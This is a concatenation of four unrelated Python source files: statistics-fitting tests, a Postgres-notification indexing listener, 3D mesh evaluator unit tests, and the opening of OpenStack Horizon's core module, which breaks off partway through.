nt.assert_almost_equal(fit_.errs[1], 0.745431659944, 12)
def test_fit_default_is_normal():
fit0_ = st.fit(NORMAL)
fit1_ = st.fit(NORMAL, 'norm')
nt.eq_(fit0_.params, fit1_.params)
nt.eq_(fit0_.errs, fit1_.errs)
def test_optimal_distribution_normal():
optimal = st.optimal_distribution(NORMAL)
nt.ok_(optimal.type == 'norm')
def test_optimal_distribution_exponential():
optimal = st.optimal_distribution(EXPON)
nt.ok_(optimal.type == 'expon')
def test_optimal_distribution_uniform():
optimal = st.optimal_distribution(UNIFORM)
nt.ok_(optimal.type == 'uniform')
def test_fit_results_dict_uniform():
a = st.FitResults(params=[1, 2], errs=[3,4], type='uniform')
d = st.fit_results_to_dict(a)
nt.assert_equal(d['min'], 1)
nt.assert_equal(d['max'], 3)
nt.assert_equal(d['type'], 'uniform')
def test_fit_results_dict_uniform_min_max():
a = st.FitResults(params=[1, 2], errs=[3,4], type='uniform')
d = st.fit_results_to_dict(a, min_bound=-100, max_bound=100)
nt.assert_equal(d['min'], 1)
nt.assert_equal(d['max'], 3)
nt.assert_equal(d['type'], 'uniform')
def test_fit_results_dict_normal():
a = st.FitResults(params=[1, 2], errs=[3,4], type='norm')
d = st.fit_results_to_dict(a)
nt.assert_equal(d['mu'], 1)
nt.assert_equal(d['sigma'], 2)
nt.assert_equal(d['type'], 'normal')
def test_fit_results_dict_normal_min_max():
a = st.FitResults(params=[1, 2], errs=[3,4], type='norm')
d = st.fit_results_to_dict(a, min_bound=-100, max_bound=100)
nt.assert_equal(d['mu'], 1)
nt.assert_equal(d['sigma'], 2)
nt.assert_equal(d['min'], -100)
nt.assert_equal(d['max'], 100)
nt.assert_equal(d['type'], 'normal')
def test_fit_results_dict_exponential():
a = st.FitResults(params=[2, 2], errs=[3,4], type='expon')
d = st.fit_results_to_dict(a)
nt.assert_equal(d['lambda'], 1./2)
nt.assert_equal(d['type'], 'exponential')
def test_fit_results_dict_exponential_min_max():
a = st.FitResults(params=[2, 2], errs=[3,4], type='expon')
d = st.fit_results_to_dict(a, min_bound=-100, max_bound=100)
nt.assert_equal(d['lambda'], 1./2)
nt.assert_equal(d['min'], -100)
nt.assert_equal(d['max'], 100)
nt.assert_equal(d['type'], 'exponential')
def test_scalar_stats():
data = np.array([1.,2.,3.,4.,5.])
result = st.scalar_stats(data)
RESULT = {'mean': 3.,
'max': 5.,
'min': 1.,
'std': 1.4142135623730951}
nt.assert_true(RESULT == result)
def test_compare_two():
data = np.array([1., 1., 2., 2.])
data_same = np.array([1.0, 1.0, 2.0, 2.0])
data_close = np.array([1.02, 1.01, 2.001, 2.0003])
data_far = np.array([200., 100., 201])
results1 = st.compare_two(data, data_same, test=st.StatTests.ks)
nt.assert_almost_equal(results1.dist, 0.0)
nt.assert_almost_equal(results1.pvalue, 1.0)
results2 = st.compare_two(data, data_close, test=st.StatTests.ks)
nt.assert_almost_equal(results2.dist, 0.5)
nt.assert_almost_equal(results2.pvalue, 0.5344157, places=5)
results3 = st.compare_two(data, data_far, test=st.StatTests.ks)
nt.assert_almost_equal(results3.dist, 1.0)
nt.assert_almost_equal(results3.pvalue, 0.0205039, places=5)
distr1 = np.ones(100)
distr2 = 2*np.ones(100)
def test_compare_two_ks():
results1 = st.compare_two(distr1, distr1, test=st.StatTests.ks)
nt.assert_almost_equal(results1.dist, 0.0, places=5)
nt.assert_almost_equal(results1.pvalue, 1.0, places=5)
results2 = st.compare_two(distr1, distr2, test=st.StatTests.ks)
nt.assert_almost_equal(results2.dist, 1.0, places=5)
nt.assert_almost_equal(results2.pvalue, 0.0, places=5)
def test_compare_two_wilcoxon():
results2 = st.compare_two(distr1, distr2, test=st.StatTests.wilcoxon)
nt.assert_almost_equal(results2.dist, 0.0, places=5)
nt.assert_almost_equal(results2.pvalue, 0.0, places=5)
def test_compare_two_ttest():
results1 = st.compare_two(distr1, distr1, test=st.StatTests.ttest)
nt.ok_(np.isnan(results1.dist))
nt.ok_(np.isnan(results1.pvalue))
results2 = st.compare_two(distr1, distr2, test=st.StatTests.ttest)
nt.ok_(np.isinf(results2.dist))
nt.assert_almost_equal(results2.pvalue, 0.0, places=5)
@nt.raises(TypeError)
def test_compare_two_error():
data = np.array([1., 1., 2., 2.])
data_same = np.array([1.0, 1.0, 2.0, 2.0])
results1 = st.compare_two(data, data_same, test='test')
def test_total_score():
testList1 = (([1.,1., 1],[1.,1.,1.]),
([2.,3.,4.,5.],[2.,3.,4.,5.]))
score = st.total_score(testList1)
nt.assert_almost_equal(score, 0.)
testList2 = (([1.,1., 1],[2.,2.,2.]),
([2.,3.,4.,5.],[2.,3.,4.,5.]))
score = st.total_score(testList2, p=1)
nt.assert_almost_equal(score, 1.)
testList3 = (([1.,1., 1],[2.,2.,2.]),
([3.,3.,3.,3.],[4., 4., 4., 4.]))
score = st.total_score(testList3, p=2)
nt.assert_almost_equal(score, np.sqrt(2.))
|
|
"""\
Example.
%(prog)s production.ini
"""
from webtest import TestApp
from contentbase.storage import DBSession
import atexit
import datetime
import json
import logging
import os
import psycopg2
import select
import signal
import socket
import sqlalchemy.exc
import sys
import threading
import time
from urllib.parse import parse_qsl
log = logging.getLogger(__name__)
EPILOG = __doc__
DEFAULT_TIMEOUT = 60
PY2 = sys.version_info[0] == 2
# We need this because of MVCC visibility.
# See slide 9 at http://momjian.us/main/writings/pgsql/mvcc.pdf
# https://devcenter.heroku.com/articles/postgresql-concurrency
def run(testapp, timeout=DEFAULT_TIMEOUT, dry_run=False, control=None, update_status=None):
assert update_status is not None
timestamp = datetime.datetime.now().isoformat()
update_status(
status='connecting',
timestamp=timestamp,
timeout=timeout,
)
max_xid = 0
engine = DBSession.bind # DBSession.bind is configured by app init
# noqa http://docs.sqlalchemy.org/en/latest/faq.html#how-do-i-get-at-the-raw-dbapi-connection-when-using-an-engine
connection = engine.pool.unique_connection()
try:
connection.detach()
conn = connection.connection
conn.autocommit = True
sockets = [conn]
if control is not None:
sockets.append(control)
recovery = None
listening = False
with conn.cursor() as cursor:
while True:
if not listening:
# cannot execute LISTEN during recovery
cursor.execute("""SELECT pg_is_in_recovery();""")
recovery, = cursor.fetchone()
if not recovery:
# http://initd.org/psycopg/docs/advanced.html#asynchronous-notifications
cursor.execute("""LISTEN "contentbase.transaction";""")
cursor.execute("""LISTEN "clincoded.transaction";""") # BBB
log.debug("Listener connected")
listening = True
cursor.execute("""SELECT txid_current_snapshot();""")
snapshot, = cursor.fetchone()
timestamp = datetime.datetime.now().isoformat()
update_status(
listening=listening,
recovery=recovery,
snapshot=snapshot,
status='indexing',
timestamp=timestamp,
max_xid=max_xid,
)
try:
res = testapp.post_json('/index', {
'record': True,
'dry_run': dry_run,
'recovery': recovery,
})
except Exception as e:
timestamp = datetime.datetime.now().isoformat()
log.exception('index failed at max xid: %d', max_xid)
update_status(error={
'error': repr(e),
'max_xid': max_xid,
'timestamp': timestamp,
})
else:
timestamp = datetime.datetime.now().isoformat()
result = res.json
result['stats'] = {
k: int(v) for k, v in parse_qsl(
res.headers.get('X-Stats', ''))
}
result['timestamp'] = timestamp
update_status(last_result=result)
if result.get('indexed', 0):
update_status(result=result)
log.info(result)
update_status(
status='waiting',
timestamp=timestamp,
max_xid=max_xid,
)
# Wait on notifcation
readable, writable, err = select.select(sockets, [], sockets, timeout)
if err:
raise Exception('Socket error')
if control in readable:
command = control.recv(1)
log.debug('received command: %r', command)
if not command:
# Other end shutdown
return
if conn in readable:
conn.poll()
while conn.notifies:
notify = conn.notifies.pop()
xid = int(notify.payload)
max_xid = max(max_xid, xid)
log.debug('NOTIFY %s, %s', notify.channel, notify.payload)
finally:
connection.close()
class ErrorHandlingThread(threading.Thread):
if PY2:
@property
def _kwargs(self):
return self._Thread__kwargs
@property
def _args(self):
return self._Thread__args
@property
def _target(self):
return self._Thread__target
def run(self):
timeout = self._kwargs.get('timeout', DEFAULT_TIMEOUT)
update_status = self._kwargs['update_status']
control = self._kwargs['control']
while True:
try:
self._target(*self._args, **self._kwargs)
except (psycopg2.OperationalError, sqlalchemy.exc.OperationalError) as e:
# Handle database restart
log.exception('Database went away')
timestamp = datetime.datetime.now().isoformat()
update_status(
timestamp=timestamp,
status='sleeping',
error={'error': repr(e), 'timestamp': timestamp},
)
readable, _, _ = select.select([control], [], [], timeout)
if control in readable:
command = control.recv(1)
log.debug('received command: %r', command)
if not command:
# Other end shutdown
return
log.debug('sleeping')
time.sleep(timeout)
continue
except Exception:
# Unfortunately mod_wsgi does not restart immediately
log.exception('Exception in listener, restarting process at next request.')
os.kill(os.getpid(), signal.SIGINT)
break
def composite(loader, global_conf, **settings):
listener = None
# Register before testapp creation.
@atexit.register
def join_listener():
if listener:
log.debug('joining listening thread')
listener.join()
# Composite app is used so we can load the main app
app_name = settings.get('app', None)
app = loader.get_app(app_name, global_conf=global_conf)
username = settings.get('username', 'IMPORT')
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
testapp = TestApp(app, environ)
# Use sockets to integrate with select
controller, control = socket.socketpair()
timestamp = datetime.datetime.now().isoformat()
status_holder = {
'status': {
'status': 'starting listener',
'started': timestamp,
'errors': [],
'results': [],
},
}
def update_status(error=None, result=None, indexed=None, **kw):
# Setting a value in a dictionary is atomic
status = status_holder['status'].copy()
status.update(**kw)
if error is not None:
status['errors'] = [error] + status['errors'][:9]
if result is not None:
status['results'] = [result] + status['results'][:9]
status_holder['status'] = status
kwargs = {
'testapp': testapp,
'control': control,
'update_status': update_status,
}
if 'timeout' in settings:
kwargs['timeout'] = float(settings['timeout'])
listener = ErrorHandlingThread(target=run, name='listener', kwargs=kwargs)
listener.daemon = True
log.debug('starting listener')
listener.start()
# Register before testapp creation.
@atexit.register
def shutdown_listener():
log.debug('shutting down listening thread')
control # Prevent early gc
controller.shutdown(socket.SHUT_RDWR)
def status_app(environ, start_response):
status = '200 OK'
response_headers = [('Content-type', 'application/json')]
start_response(status, response_headers)
return [json.dumps(status_holder['status'])]
return status_app
def internal_app(configfile, app_name=None, username=None):
from webtest import TestApp
from pyramid import paster
app = paster.get_app(configfile, app_name)
if not username:
username = 'IMPORT'
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
return TestApp(app, environ)
def main():
import argparse
parser = argparse.ArgumentParser(
description="Listen for changes from postgres and index in elasticsearch",
epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--app-name', help="Pyramid app name in configfile")
parser.add_argument(
'--username', '-u', default='INDEXER', help="Import username")
parser.add_argument(
'--dry-run', action='store_true', help="Don't post to ES, just print")
parser.add_argument(
'-v', '--verbose', action='store_true', help="Print debug level logging")
parser.add_argument(
'--poll-interval', type=int, default=DEFAULT_TIMEOUT,
help="Poll interval between notifications")
parser.add_argument('config_uri', help="path to configfile")
args = parser.parse_args()
logging.basicConfig()
testapp = internal_app(args.config_uri, args.app_name, args.username)
# Loading app will have configured from config file. Reconfigure here:
if args.verbose or args.dry_run:
logging.getLogger('clincoded').setLevel(logging.DEBUG)
return run(testapp, args.poll_interval, args.dry_run)
if __name__ == '__main__':
main()
|
|
##########################################################################
#
# Copyright (c) 2008, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import math
import unittest
import random
import imath
import IECore
import IECoreScene
class TestMeshPrimitiveEvaluator( unittest.TestCase ) :
def testConstructor( self ) :
m = IECoreScene.MeshPrimitive()
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData() )
e = IECoreScene.MeshPrimitiveEvaluator( m )
def testResultTypeValidation( self ) :
m = IECoreScene.MeshPrimitive()
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData() )
e = IECoreScene.PrimitiveEvaluator.create( m )
wrongResultType = IECoreScene.PrimitiveEvaluator.create( IECoreScene.SpherePrimitive() ).createResult()
self.assertRaises( Exception, e.closestPoint, imath.V3f( 0 ), wrongResultType )
def testEmptyMesh( self ) :
""" Testing MeshPrimitiveEvaluator with empty mesh"""
m = IECoreScene.MeshPrimitive()
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData() )
mpe = IECoreScene.PrimitiveEvaluator.create( m )
self.assert_( mpe.isInstanceOf( "MeshPrimitiveEvaluator" ) )
r = mpe.createResult()
foundClosest = mpe.closestPoint( imath.V3f( 0, 10, 0 ), r )
self.failIf( foundClosest )
def testTangents( self ) :
reader = IECore.Reader.create( "test/IECore/data/cobFiles/pSphereShape1.cob" )
m = reader.read()
self.assert_( m.isInstanceOf( "MeshPrimitive" ) )
numTriangles = len( m.verticesPerFace )
mpe = IECoreScene.PrimitiveEvaluator.create( m )
r = mpe.createResult()
# Currently unimplemented
self.assertRaises( RuntimeError, r.uTangent )
self.assertRaises( RuntimeError, r.vTangent )
def testSimpleMesh( self ) :
""" Testing MeshPrimitiveEvaluator with mesh containing single triangle"""
verticesPerFace = IECore.IntVectorData()
verticesPerFace.append( 3 )
vertexIds = IECore.IntVectorData()
vertexIds.append( 0 )
vertexIds.append( 1 )
vertexIds.append( 2 )
translation = imath.V3f( 3, 3, 3 )
P = IECore.V3fVectorData()
P.append( imath.V3f( -1, 0, 0 ) + translation )
P.append( imath.V3f( 0, 0, -1 ) + translation )
P.append( imath.V3f( -1, 0, -1 ) + translation )
uOffset = 7
uv = IECore.V2fVectorData()
vOffset = 12
for p in P :
uv.append( imath.V2f( p.x + uOffset, p.z + vOffset ) )
self.assertEqual( len( P ), len( uv ) )
m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )
# We use Varying interpolation here because the tests which use pSphereShape1.cob exercise FaceVarying
m["uv"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Varying, uv )
mpe = IECoreScene.PrimitiveEvaluator.create( m )
r = mpe.createResult()
# For each point verify that the closest point to it is itself
for p in P:
foundClosest = mpe.closestPoint( p , r )
self.assert_( foundClosest )
self.assertAlmostEqual( ( p - r.point() ).length(), 0 )
foundClosest = mpe.closestPoint( imath.V3f( 0, 10, 0 ) + translation , r )
self.assert_( foundClosest )
self.assertAlmostEqual( ( imath.V3f( -0.5, 0, -0.5 ) + translation - r.point()).length(), 0 )
self.assertAlmostEqual( math.fabs( r.normal().dot( imath.V3f(0, 1, 0 ) ) ) , 1, places = 3 )
# For each point verify that the UV data is exactly what we specified at those vertices
for p in P:
foundClosest = mpe.closestPoint( p , r )
self.assert_( foundClosest )
testUV = imath.V2f( p.x + uOffset, p.z + vOffset )
self.assertAlmostEqual( ( testUV - r.uv() ).length(), 0 )
# Now when we looking up that UV in reverse we should get back the point again!
found = mpe.pointAtUV( testUV, r )
self.assert_( found )
self.assertAlmostEqual( ( p - r.point()).length(), 0 )
# test the uvBound method
uvb = imath.Box2f()
for i in range( 0, len( uv ) ) :
uvb.extendBy( uv[i] )
self.assertEqual( mpe.uvBound(), uvb )
def testSphereMesh( self ) :
""" Testing MeshPrimitiveEvaluator with sphere mesh"""
# File represents a sphere of radius 1.0 at the origin
reader = IECore.Reader.create( "test/IECore/data/cobFiles/pSphereShape1.cob" )
m = reader.read()
self.assert_( m.isInstanceOf( "MeshPrimitive" ) )
numTriangles = len( m.verticesPerFace )
mpe = IECoreScene.PrimitiveEvaluator.create( m )
maxAbsError = 0.2
# Test volume against (theoretical) 4/3 * pi * r^3
self.assert_( math.fabs ( 4.0 / 3.0 * math.pi * ( 1.0 * 1.0 * 1.0 ) - mpe.volume() ) < maxAbsError )
# Center of gravity should be at origin
self.assert_( mpe.centerOfGravity().length() < maxAbsError )
# Test surface area against (theoretical) 4 * pi * r^20
self.assert_( math.fabs ( 4.0 * math.pi * ( 1.0 * 1.0 ) - mpe.surfaceArea() ) < maxAbsError )
r = mpe.createResult()
random.seed( 1 )
# Perform 100 closest point queries
for i in range(0, 100):
# Pick a random point outside the sphere
testPt = None
while not testPt or testPt.length() < 1.5:
testPt = 3 * imath.V3f( random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1) )
foundClosest = mpe.closestPoint( testPt, r )
self.assert_( foundClosest )
# Closest point should lie on unit sphere
self.assert_( math.fabs( r.point().length() - 1.0 ) < maxAbsError )
# Distance to closest point should be approximately distance to origin minus sphere radius - allow some error
# because our source mesh does not represent a perfect sphere.
absError = math.fabs( ( testPt - r.point() ).length() - ( testPt.length() - 1.0 ) )
self.assert_( absError < maxAbsError )
self.assert_( r.triangleIndex() >= 0 )
self.assert_( r.triangleIndex() < numTriangles )
# Origin->Closest point should be roughly same direction as Origin->Test point, for a sphere
self.assert_( r.point().normalized().dot( testPt.normalized() ) > 0.5 )
geometricNormal = r.normal().normalized()
shadingNormal = r.vectorPrimVar( m["N"] ).normalized()
# Geometric and shading normals should be facing the same way, roughly
self.assert_( geometricNormal.dot( shadingNormal ) > 0.5 )
# Shading normal should be pointing away from the origin at the closest point
self.assert_( shadingNormal.dot( r.point().normalized() ) > 0.5 )
# Vector from closest point to test point should be roughly the same direction as the normal
self.assert_( shadingNormal.dot( ( testPt - r.point() ).normalized() ) > 0.5 )
rand = imath.Rand48()
# Perform 100 ray intersection queries from inside the sphere, in random directions
for i in range(0, 100):
origin = rand.nextSolidSphere( imath.V3f() ) * 0.5
direction = rand.nextHollowSphere( imath.V3f() )
hit = mpe.intersectionPoint( origin, direction, r )
self.assert_( hit )
self.assert_( math.fabs( r.point().length() -1 ) < 0.1 )
hits = mpe.intersectionPoints( origin, direction )
self.assertEqual( len(hits), 1 )
for hit in hits:
self.assert_( math.fabs( hit.point().length() -1 ) < 0.1 )
# Perform 100 nearest ray intersection queries from outside the sphere, going outwards
for i in range(0, 100):
direction = rand.nextHollowSphere( imath.V3f() )
origin = direction * 2
hit = mpe.intersectionPoint( origin, direction, r )
self.failIf( hit )
hits = mpe.intersectionPoints( origin, direction )
self.failIf( hits )
# Perform 100 nearest ray intersection queries from outside the sphere, going inwards
for i in range(0, 100):
direction = -rand.nextHollowSphere( imath.V3f() )
origin = -direction * 2
hit = mpe.intersectionPoint( origin, direction, r )
self.assert_( hit )
self.assert_( math.fabs( r.point().length() -1 ) < 0.1 )
# Make sure we get the nearest point, not the furthest
self.assert_( ( origin - r.point() ).length() < 1.1 )
hits = mpe.intersectionPoints( origin, direction )
# There should be 0, 1, or 2 intersections
self.assert_( len(hits) >= 0 )
self.assert_( len(hits) <= 2 )
for hit in hits:
self.assert_( math.fabs( hit.point().length() - 1 ) < 0.1 )
def testCylinderMesh( self ) :
"""Testing special case of intersection query."""
m = IECore.Reader.create( "test/IECore/data/cobFiles/cylinder3Mesh.cob" ) ()
e = IECoreScene.MeshPrimitiveEvaluator( m )
res = e.createResult()
self.failIf( e.intersectionPoint( imath.V3f(0.5,0,0.5), imath.V3f(1,0,0), res ) )
self.assert_( e.intersectionPoint( imath.V3f(0.5,0,0.5), imath.V3f(-1,0,0), res ) )
self.failIf( e.intersectionPoints( imath.V3f(0.5,0,0.5), imath.V3f(1,0,0) ) )
self.assert_( e.intersectionPoints( imath.V3f(0.5,0,0.5), imath.V3f(-1,0,0) ) )
def testRandomTriangles( self ) :
""" Testing MeshPrimitiveEvaluator with random triangles"""
random.seed( 100 )
rand = imath.Rand48( 100 )
numConfigurations = 100
numTests = 50
numTriangles = 250
for config in range( 0, numConfigurations ) :
P = IECore.V3fVectorData()
verticesPerFace = IECore.IntVectorData()
vertexIds = IECore.IntVectorData()
vertexId = 0
for tri in range( 0, numTriangles ) :
verticesPerFace.append( 3 )
P.append( imath.V3f( random.uniform(-10, 10), random.uniform(-10, 10), random.uniform(-10, 10) ) )
P.append( imath.V3f( random.uniform(-10, 10), random.uniform(-10, 10), random.uniform(-10, 10) ) )
P.append( imath.V3f( random.uniform(-10, 10), random.uniform(-10, 10), random.uniform(-10, 10) ) )
vertexIds.append( vertexId + 0 )
vertexIds.append( vertexId + 1 )
vertexIds.append( vertexId + 2 )
vertexId = vertexId + 3
m = IECoreScene.MeshPrimitive( verticesPerFace, vertexIds )
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, P )
mpe = IECoreScene.PrimitiveEvaluator.create( m )
r = mpe.createResult()
r2 = mpe.createResult()
# Make sure that the closest hit point found with intersectionPoint() is actually the closest, by
# comparing long-hand with the list of all intersections.
for test in range( 0, numTests ) :
origin = imath.V3f( 0, 0, 0 )
direction = rand.nextHollowSphere( imath.V3f() )
hit = mpe.intersectionPoint( origin, direction, r )
if hit:
hits = mpe.intersectionPoints( origin, direction )
self.assert_( hits )
closestHitDist = 100000
closestHit = None
for hit in hits :
hitDist = ( origin - hit.point() ).length()
if hitDist < closestHitDist:
closestHitDist = hitDist
closestHit = hit
self.assert_( (r.point() - closestHit.point() ).length() < 1.e-4 )
barycentricQuerySucceeded = mpe.barycentricPosition( r.triangleIndex(), r.barycentricCoordinates(), r2 )
self.failUnless( barycentricQuerySucceeded )
self.failUnless( r.point().equalWithAbsError( r2.point(), 0.00001 ) )
self.failUnless( r.normal().equalWithAbsError( r2.normal(), 0.00001 ) )
self.failUnless( r.barycentricCoordinates().equalWithAbsError( r2.barycentricCoordinates(), 0.00001 ) )
self.assertEqual( r.triangleIndex(), r2.triangleIndex() )
else:
hits = mpe.intersectionPoints( origin, direction )
self.failIf( hits )
def testEvaluateIndexedPrimitiveVariables( self ) :
m = IECoreScene.MeshPrimitive(
# Two triangles
IECore.IntVectorData( [ 3, 3 ] ),
# Winding counter clockwise
IECore.IntVectorData( [ 0, 1, 2, 0, 2, 3 ] ),
# Linear interpolation
"linear",
# Points in shape of a square
IECore.V3fVectorData( [
imath.V3f( 0, 0, 0 ),
imath.V3f( 1, 0, 0 ),
imath.V3f( 1, 1, 0 ),
imath.V3f( 0, 1, 0 )
] )
)
m["uniform"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Uniform,
IECore.IntVectorData( [ 123, 321 ] ),
IECore.IntVectorData( [ 1, 0 ] ),
)
m["vertex"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.FloatVectorData( [ 314, 271 ] ),
IECore.IntVectorData( [ 0, 1, 1, 0] ),
)
m["faceVarying"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.FaceVarying,
IECore.FloatVectorData( [ 10, 20, 30 ] ),
IECore.IntVectorData( [ 0, 1, 2, 0, 1, 2 ] ),
)
evaluator = IECoreScene.PrimitiveEvaluator.create( m )
result = evaluator.createResult()
# Test each corner of each triangle
for triangleIndex in ( 0, 1 ) :
for corner in ( 0, 1, 2 ) :
bary = imath.V3f( 0 )
bary[corner] = 1
self.assertTrue( evaluator.barycentricPosition( triangleIndex, bary, result ) )
self.assertEqual(
result.intPrimVar( m["uniform"] ),
m["uniform"].data[m["uniform"].indices[triangleIndex]]
)
vertexIndex = m.vertexIds[triangleIndex*3+corner]
self.assertEqual(
result.floatPrimVar( m["vertex"] ),
m["vertex"].data[m["vertex"].indices[vertexIndex]]
)
self.assertEqual(
result.floatPrimVar( m["faceVarying"] ),
m["faceVarying"].data[m["faceVarying"].indices[triangleIndex*3+corner]]
)
if __name__ == "__main__":
unittest.main()
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Contains the core classes and functionality that makes Horizon what it is.
This module is considered internal, and should not be relied on directly.
Public APIs are made available through the :mod:`horizon` module and
the classes contained therein.
"""
import copy
import functools
import inspect
from django.conf import settings
from django.conf.urls.defaults import patterns, url, include
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse, RegexURLPattern
from django.utils.functional import SimpleLazyObject
from django.utils.importlib import import_module
from django.utils.module_loading import module_has_submodule
from django.utils.translation import ugettext as _
from horizon.decorators import require_roles, _current_component
# Default configuration dictionary. Do not mutate directly. Use copy.copy().
HORIZON_CONFIG = {
# Allow for ordering dashboards; list or tuple if provided.
'dashboards': None,
# Name of a default dashboard; defaults to first alphabetically if None
'default_dashboard': None,
'user_home': None,
}
def _decorate_urlconf(urlpatterns, decorator, *args, **kwargs):
for pattern in urlpatterns:
if getattr(pattern, 'callback', None):
pattern._callback = decorator(pattern.callback, *args, **kwargs)
if getattr(pattern, 'url_patterns', []):
_decorate_urlconf(pattern.url_patterns, decorator, *args, **kwargs)
class NotRegistered(Exception):
pass
class HorizonComponent(object):
def __init__(self):
super(HorizonComponent, self).__init__()
if not self.slug:
raise ImproperlyConfigured('Every %s must have a slug.'
% self.__class__)
def __unicode__(self):
return getattr(self, 'name', u"Unnamed %s" % self.__class__.__name__)
def _get_default_urlpatterns(self):
package_string = '.'.join(self.__module__.split('.')[:-1])
if getattr(self, 'urls', None):
try:
mod = import_module('.%s' % self.urls, package_string)
except ImportError:
mod = import_module(self.urls)
urlpatterns = mod.urlpatterns
else:
# Try importing a urls.py from the dashboard package
if module_has_submodule(import_module(package_string), 'urls'):
urls_mod = import_module('.urls', package_string)
urlpatterns = urls_mod.urlpatterns
else:
urlpatterns = patterns('')
return urlpatterns
class Registry(object):
def __init__(self):
self._registry = {}
if not getattr(self, '_registerable_class', None):
raise ImproperlyConfigured('Subclasses of Registry must set a '
'"_registerable_class" property.')
def _register(self, cls):
"""Registers the given class.
If the specified class is already registered then it is ignored.
"""
if not inspect.isclass(cls):
raise ValueError('Only classes may be registered.')
elif not issubclass(cls, self._registerable_class):
raise ValueError('Only %s classes or subclasses may be registered.'
% self._registerable_class)
if cls not in self._registry:
cls._registered_with = self
self._registry[cls] = cls()
return self._registry[cls]
def _unregister(self, cls):
"""Unregisters the given class.
If the specified class isn't registered, ``NotRegistered`` will
be raised.
"""
if not issubclass(cls, self._registerable_class):
raise ValueError('Only %s classes or subclasses may be '
'unregistered.' % self._registerable_class)
if cls not in self._registry.keys():
raise NotRegistered('%s is not registered' % cls)
del self._registry[cls]
return True
def _registered(self, cls):
if inspect.isclass(cls) and issubclass(cls, self._registerable_class):
cls = self._registry.get(cls, None)
if cls:
return cls
else:
# Allow for fetching by slugs as well.
for registered in self._registry.values():
if registered.slug == cls:
return registered
raise NotRegistered('%s with slug "%s" is not registered'
% (self._registerable_class, cls))
class Panel(HorizonComponent):
""" A base class for defining Horizon dashboard panels.
All Horizon dashboard panels should extend from this class. It provides
the appropriate hooks for automatically constructing URLconfs, and
providing role-based access control.
.. attribute:: name
The name of the panel. This will be displayed in the
auto-generated navigation and various other places.
Default: ``''``.
.. attribute:: slug
A unique "short name" for the panel. The slug is used as
a component of the URL path for the panel. Default: ``''``.
.. attribute: roles
A list of role names, all of which a user must possess in order
to access any view associated with this panel. This attribute
is combined cumulatively with any roles required on the
``Dashboard`` class with which it is registered.
.. attribute:: urls
Path to a URLconf of views for this panel using dotted Python
notation. If no value is specified, a file called ``urls.py``
living in the same package as the ``panel.py`` file is used.
Default: ``None``.
.. attribute:: nav
.. method:: nav(context)
The ``nav`` attribute can be either boolean value or a callable
which accepts a ``RequestContext`` object as a single argument
to control whether or not this panel should appear in
automatically-generated navigation. Default: ``True``.
"""
name = ''
slug = ''
urls = None
nav = True
def __repr__(self):
return "<Panel: %s>" % self.__unicode__()
def get_absolute_url(self):
""" Returns the default URL for this panel.
The default URL is defined as the URL pattern with ``name="index"`` in
the URLconf for this panel.
"""
return reverse('horizon:%s:%s:index' % (self._registered_with.slug,
self.slug,))
@property
def _decorated_urls(self):
urlpatterns = self._get_default_urlpatterns()
# Apply access controls to all views in the patterns
roles = getattr(self, 'roles', [])
_decorate_urlconf(urlpatterns, require_roles, roles)
_decorate_urlconf(urlpatterns, _current_component, panel=self)
# Return the three arguments to django.conf.urls.defaults.include
